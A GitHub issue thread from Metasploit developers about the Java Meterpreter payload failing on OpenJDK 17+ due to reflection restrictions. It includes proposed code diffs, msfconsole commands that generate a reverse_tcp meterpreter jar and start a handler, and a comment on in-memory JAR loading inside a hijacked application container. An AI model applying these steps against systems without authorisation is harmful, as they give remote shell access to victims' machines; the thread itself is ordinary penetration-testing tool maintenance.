### ISSUE TITLE
Java meterpreter no longer working with openjdk 17+ due to reflection changes

### ISSUE THREAD

**Issue by adfoster-r7** [rapid7/metasploit-payloads#647]
### Problem

Java Meterpreter no longer works with openjdk17+ due to changes in jdk 9's reflection policy:

```
java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @2a84aee7

```

### Current behavior

The following code no longer works with open jdk17+ - which adds support for [`new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);`](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L73)

https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L23-L65

Stack trace caught [here](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L63)

```
java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @2a84aee7
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
	at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:180)
	at java.base/java.lang.reflect.Field.setAccessible(Field.java:174)
	at com.metasploit.meterpreter.MemoryBufferURLConnection.<clinit>(Unknown Source)
	at javapayload.stage.Meterpreter.start(Unknown Source)
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
	at java.base/java.lang.reflect.Method.invoke(Method.java:577)
	at metasploit.Payload.bootstrap(Unknown Source)
	at metasploit.Payload.main(Unknown Source)


```

### Context

It's not possible to use reflection on java.net.URL now in JDK17+

Example code:

```java
import java.net.URL;
import java.lang.reflect.Field;

public class MyClass {
    public static void main(String args[]) throws NoSuchFieldException {
      Field field = URL.class.getDeclaredField("handlers");
      field.setAccessible(true);
 
      System.out.println(field);
    }
}
```

Example output JDK11.0.4 - https://www.jdoodle.com/online-java-compiler/ - a warning happens on the `setAccessible` call, but it works:

```
static java.util.Hashtable java.net.URL.handlers

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by MyClass (file:/home/) to field java.net.URL.handlers
WARNING: Please consider reporting this to the maintainers of MyClass
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
```

Example JDK17.01 - https://www.jdoodle.com/online-java-compiler/ - an exception is immediately raised:

```

Exception in thread "main" java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @442d9b6e
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
	at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:178)
	at java.base/java.lang.reflect.Field.setAccessible(Field.java:172)
	at MyClass.main(MyClass.java:7)
```

### Potential solution

I looked into deleting the current static block with reflection on java.net.URL's handlers, and instead using a `MemoryBufferURLStreamHandlerFactory` implementation:

```diff
-         new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, Boolean.valueOf(!noRedirectError));

+        new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader(), MemoryBufferURLStreamHandlerFactory.getInstance()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, Boolean.valueOf(!noRedirectError));

```

And updating the Metasploit side to send the new class:

https://github.com/rapid7/metasploit-framework/blob/f89de600be578712f302a34c5b80aab92d4d3f01/lib/msf/core/payload/java/meterpreter_loader.rb#L80-L96

```diff
  def stage_class_files
    # Order matters.  Classes can only reference classes that have already
    # been sent.  The last .class must implement Stage, i.e. have a start()
    # method.
    #
    # The Meterpreter.class stage is just a jar loader, not really anything
    # to do with meterpreter specifically.  This payload should eventually
    # be replaced with an actual meterpreter stage so we don't have to send
    # a second jar.
    [
      [ "javapayload", "stage", "Stage.class" ],
      [ "com", "metasploit", "meterpreter", "MemoryBufferURLConnection.class" ],
      [ "com", "metasploit", "meterpreter", "MemoryBufferURLStreamHandler.class" ],
+     [ "com", "metasploit", "meterpreter", "MemoryBufferURLStreamHandlerFactory.class" ],
      # Must be last!
      [ "javapayload", "stage", "Meterpreter.class" ],
    ]
  end
```

I separely tried to pass in a custom connection handler in the [createURL](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L70-L75) implementation, via this [overload](https://docs.oracle.com/javase/8/docs/api/java/net/URL.html#URL-java.lang.String-java.lang.String-int-java.lang.String-java.net.URLStreamHandler-)

```diff
-             return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
+             return new URL("metasploitmembuff", "", -1, (files.size() - 1) + "/" + contentType, new MemoryBufferURLStreamHandler(files));

```

But neither approaches quite work from the cycles I spent

### Replication steps

Open msfconsole; Set lhost/port:

```
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 payload(java/meterpreter/reverse_tcp) > set lport 6007
lport => 6007

```

Generate a payload:

```
msf6 payload(java/meterpreter/reverse_tcp) > generate -o child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=6007 lhost=192.168.123.1
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
[*] Writing 5263 bytes to child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar...

```

Run a handler:

```
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
[*] Payload Handler Started as Job 4

[*] Started reverse TCP handler on 192.168.123.1:6007 

```

Run the jar:

```
$ java --version
openjdk 18.0.1 2022-04-19
OpenJDK Runtime Environment Homebrew (build 18.0.1+0)
OpenJDK 64-Bit Server VM Homebrew (build 18.0.1+0, mixed mode, sharing)
$ java -jar ./child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar


```

See the connection die:

```
msf6 payload(java/meterpreter/reverse_tcp) > Sending payload path 
[*] Sending stage (61197 bytes) to 192.168.123.1
[-] Meterpreter session 7 is not valid and will be closed
[*] 192.168.123.1 - Meterpreter session 7 closed.
```

But work with java 1.8

```
$ ✗ export JAVA_HOME=/Library/Java/JavaVirtualMachines/openjdk-8.jdk/Contents/Home

$ java -version
openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-bre_2021_10_20_23_15-b00)
OpenJDK 64-Bit Server VM (build 25.312-b00, mixed mode)
➜  metasploit-framework git:(6b101b5a4d) ✗ java -jar ./child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar
```

Session opened with java 1.8 runtime:

```
msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (61197 bytes) to 192.168.123.1
[*] Meterpreter session 8 opened (192.168.123.1:6007 -> 192.168.123.1:50120) at 2023-05-23 00:06:22 +0100
```

**Comment by adfoster-r7** [comment]
@schierlm I think you might be interested in this 👀 

Would you have any advice on how we could support newer/older versions of Java Meterpreter with the changes to Java's reflection

**Comment by schierlm** [comment]
Probably it helps by describing why I used this very dirty workaround at the first place.

When you are alone in your Java VM, the obvious solution is to call https://docs.oracle.com/javase/8/docs/api/java/net/URL.html#setURLStreamHandlerFactory-java.net.URLStreamHandlerFactory- (which won't work if somebody else in the VM has already called it, like an application container you are hijacking).

When we do not want to call this, the other option is (as you already noticed) to pass a custom URLStreamHandler(Factory) to either the URL constructor or the URLClassLoader constructor. 

There is only one "little" problem with this approach: URLClassLoader can load classes from directories as well as from JAR files. And when URLClassLoader finds out that an URL points to a Jar file, it will construct a new URL from it with "jar:" protocol, and puts the original URL string (not the object!) into one of its fields. That URL will then get an URLStreamHandler that is either of type sun.net.www.protocol.jar.handler, or is an URLStreamHandler which is looked up by the URLStreamHandlerFactory passed to the URLClassLoader. This handler will then return a JARUrlConnection for each class requested from the JAR file, which gets the (wrapped) URL passed in and will create a new URL from the original String inside the URL using the default URLStreamHandlerFactory. So even if you pass your own URLStreamHandlerFactory wherevver you can, as long as the URL will point to a JAR file, it will get lost at some point.

The "correct" solution therefore would be to reimplement (parts of) sun.net.protocol.jar.JarURLStreamHandler and sun.net.protocol.jar.JarURLConnection. Compared to the time when JavaPayload was originally written, it is easier today as there is OpenJDK available where you can "take" the base implementations and modify them to load the JAR file from the memory buffer instead of from the URL. Be careful with licensing implications, though, as OpenJDK is GPL and Oracle's lawyers are not very forgiving.

A "cleanroom" implementation of JARUrlConnection would be another option (based on JarFile public API), and maybe even indistinguishable from the implementation by Oracle (which mostly consists of wrappers to JarFile and some string handling).

**Comment by adfoster-r7** [comment]
Looks like @smashery has a pull request up for this now https://github.com/rapid7/metasploit-payloads/pull/672 :+1:
